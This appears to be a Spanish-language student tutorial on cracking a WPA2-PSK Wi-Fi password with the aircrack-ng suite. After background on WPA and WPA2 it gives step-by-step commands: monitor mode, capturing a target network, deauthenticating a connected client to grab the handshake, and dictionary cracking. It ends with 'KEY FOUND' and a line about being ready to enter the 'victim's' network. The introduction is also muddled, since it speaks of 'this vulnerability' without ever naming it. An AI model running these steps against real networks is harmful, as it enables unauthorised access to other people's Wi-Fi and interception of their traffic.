WPA2

INTRODUCCIÓN

WPA2 es actualmente la forma de encriptación y autentificación más sofisticada y fuerte de todas las implementadas, estandarizadas y utilizadas hoy en día.

Esta vulnerabilidad permite, básicamente, a cualquiera con acceso autorizado a la red Wi-Fi, a través del aire desencriptar y robar información confidencial de cualquier otro que se encuentre conectado a la misma red inalámbrica, inyectar tráfico malicioso a la red y comprometer otros dispositivos autorizados, todo esto usando software de código abierto.

¿Qué es WPA2?

WPA (Wifi Protected Access) surge como una solución temporal de la Wi-Fi Alliance mientras que en IEEE se trabajaba sobre el estándar IEEE 802.11i para securizar las redes Wireless una vez que quedó de manifiesto la debilidad de WEP (Wired Equivalent Privacy). Cuando IEEE sacó a la luz 802.11i, la Wi-Fi Alliance proporcionó la certificación WPA2 a todos aquellos dispositivos que cumplían con las especificaciones marcadas por el nuevo estándar.

Ambas soluciones, WPA y WPA2, soportan el protocolo 802.1x para la autenticación en ámbitos empresariales y la autenticación mediante clave compartida PSK (Pre-Shared Key) para los entornos SOHO (Small Office and Home Office) y ámbitos domésticos.

Diferencias entre WPA y WPA2

WPA y WPA2 se diferencian poco conceptualmente y difieren principalmente en el algoritmo de cifrado que emplean.

Mientras WPA basa el cifrado de las comunicaciones en el uso del algoritmo TKIP [Temporary Key Integrity Protocol], que está basado en RC4 al igual que WEP, WPA2 utiliza CCMP (Counter-mode/CBC-MAC Protocol) basado en AES (Advanced Encrytion System).

La segunda diferencia notable se encuentra en el algoritmo utilizado para controlar la integridad del mensaje. Mientras WPA usa una versión menos elaborada para la generación del código MIC (Message Integrity Code), o código “Michael”, WPA2 implementa una versión mejorada de MIC.

Herramientas:

  • Live CD de Backtrack 5 (Es  una distribución de Linux orientado exclusivamente a la auditoría y el testeo de la seguridad de redes y sistemas) y la suite aircrack (ya viene incorporada en backtrack)
  • Una tarjeta de red externa, en este caso usaremos una TP-LINK.
  • Un router.

Determinar nuestros requerimientos y necesidades

Primero tienes que decidir si simplemente quieres capturar o escuchar tráfico wireless o si tambien quieres inyectar paquetes. Es importante decidir esto en primer lugar, y tener en cuenta que Windows solo puede ser usado para capturar tráfico. Windows no puede inyectar paquetes con aireplay-ng. Esta es una limitación fundamental. Además, hay muy pocas tarjetas compatibles con Windows.

Dependiendo de la tarjeta/chipset, Linux te da las dos posibilidades de capturar e inyectar paquetes.

Respecto al tipo de tarjeta: Hoy en día puedes elegir entre tarjetas PCI, PCMCIA o USB. Si tienes un PC de sobremesa lo ideal es instalar unatarjeta PCI que llevan incluido un conector para antena externa, con lo cual podremos añadirle una antena de mas ganancia. Si tienes un portatil con ranura PCMCIA existen en el mercado tarjetas de este tipo con conector de antena externo; pero ahora la mayoría de los portátiles ya no tienen ranura PCMCIA sino Express-card y de este tipo aun no hay en el mercado tarjetas wireless. Por último las tarjetas USB son ideales si quieres usarla tanto en un portatil como en un PC de sobremesa; y aunque hay alguna que incorpora conector de antena lamayoría no lo traen, pero siempre se puede hacer un simple apaño como se explica en este tutorial: Latantena (Cantenna), antena direccional mejorada.

Lo malo de las tarjetas USB es que no están tan desarrollados algunos drivers y no existen drivers para tarjetas USB con chipset atheros.

Por lo tanto, lo primero que tienes que decidir es:

  • Qué sistema operativo planeas usar (ten en cuenta que si no quieres instalar Linux en tu PC puedes usar un Live-Cd)
  • El tipo de formato de tarjeta wireless (PCI, PCMCIA, USB, etc.)
  • Que opciones necesiatas (solo capturar, o tambien inyectar)

Pasos Básicos:

  • Poner la interfaz en modo monitor
  • Encontrar la red inalámbrica (protegida con WPA2 y una clave previamente compartida)
  • Capturar todos los paquetes
  • Espere hasta que vea a un cliente y desautentificación el cliente, por lo que el apretón de manos puede ser capturado
  • Romper la clave utilizando un archivo de diccionario (o por medio de John The Ripper)

Pasos:

1)   Abrimos una Shell y escribimos el comando:

     airmon-ng

Comando que  permite conocer nuestra interfaz de red.

2)   Luego:

    airmon-ng  start  wlan0  —>   (  nombre de nuestra interfaz de   red)

Comando que pone a nuestra tarjeta wireless en modo monitoreo, esto sirve para poder sniffar los paquetes de la red wireless a la que tenemos pensado acceder.

 

3)   Ejecutamos el comando:

airodump-ng  mon0  ——>(interfaz en modo monitoreo)  

  

Comando que nos permite escanear todas las redes que se encuentran en el ambiente.

Escogeremos nuestra red a vulnerar y tomaremos en cuenta los siguientes datos:

ESSID: Nombre de la red a hackear                             suarez

BBSID: Identificador de la red inalámbrica                  00:26:B6:4A:8D:12

CH:     Canal que utiliza nuestra red                              6

ENC:   Protocolo de encriptación                                 WPA2

        

4)  Ejecutamos el comando:

airodump-ng  -w clave –bssid 00:26:B6:4A:8D:12 – c  6 mon0

-w clave–>Es el nombre de nuestro archivo donde se guardaran los paquetes que intercepta airodump-ng y que posteriormente usaremos para crackear el password.

00:26:B6:4A:8D:12–>Identificador de la red inalámbrica.

6–>Canal que utiliza nuestra red.

mon0–>Mi interfaz en modo monitoreo.

Este comando captura el handshake o apretón de manos que se genere.

5)  Abrimos otra Shell y ejecutamos el comando:

aireplay-ng -0 20 -a 00:26:B6:4A:8D:12 -c 90:00:4B:BF:03:C1 mono

20—>Número de paquetes de desautenticación que voy a generar.

00:26:B6:4A:8D:12—>BBSID de la víctima.

90:00:4B:BF:03:C1—>Mac Address del usuario a desautenticar (STATION).

mon0—>Mi interfaz en modo monitoreo.

Este comando permite desautenticar a un usuario que este conectado y poder robar su handshake.

Observamos que se empieza a generar los paquetes de desautenticación y esperamos….

6)  En nuestra Shell anterior debe aparecer el handshake:

En nuestro caso es:               00:26:B6:4A:8D:12

7)  Realizado este retomanos la shell en donde realizamos nuestro aireplay y ejecutamos el siguiente comando:

aircrack-ng -w diccionario.txt clave-01.cap

-w diccionario.txt–>Archivo que hemos creado o diccionario donde se encuentran guardadas palabras que posiblemente serian la clave.

clave–>Archivo creado anteriormente.

-01.cap–>La ruta donde el sistema captura automáticamente el  airodump.

En el Current passphrase empieza a probar cada una de las palabras que se encuentran en nuestro diccionario con el archivo.cap  para identificar cual es la correcta.

Como podemos observar se logró la encontrar el password  — >KEY FOUND! [32847549]

ESTAMOS LISTOS PARA ACCEDER A LA RED DE NUESTRA VÍCTIMA……..

Integrantes:

ARANA RUIZ RODDY
CASTRO ZAMBRANO CINDY
GARCÉS PAREDES DÉNISSE
GUEVARA CARDENAS RODDY
MONCADA CAISE SOLANGE
MORA MERO ALLYSON
QUINTERO VELIZ DANIELA
SUÁREZ PARRALES CYNTHIA

VIDEO DE ATAQUE WPA2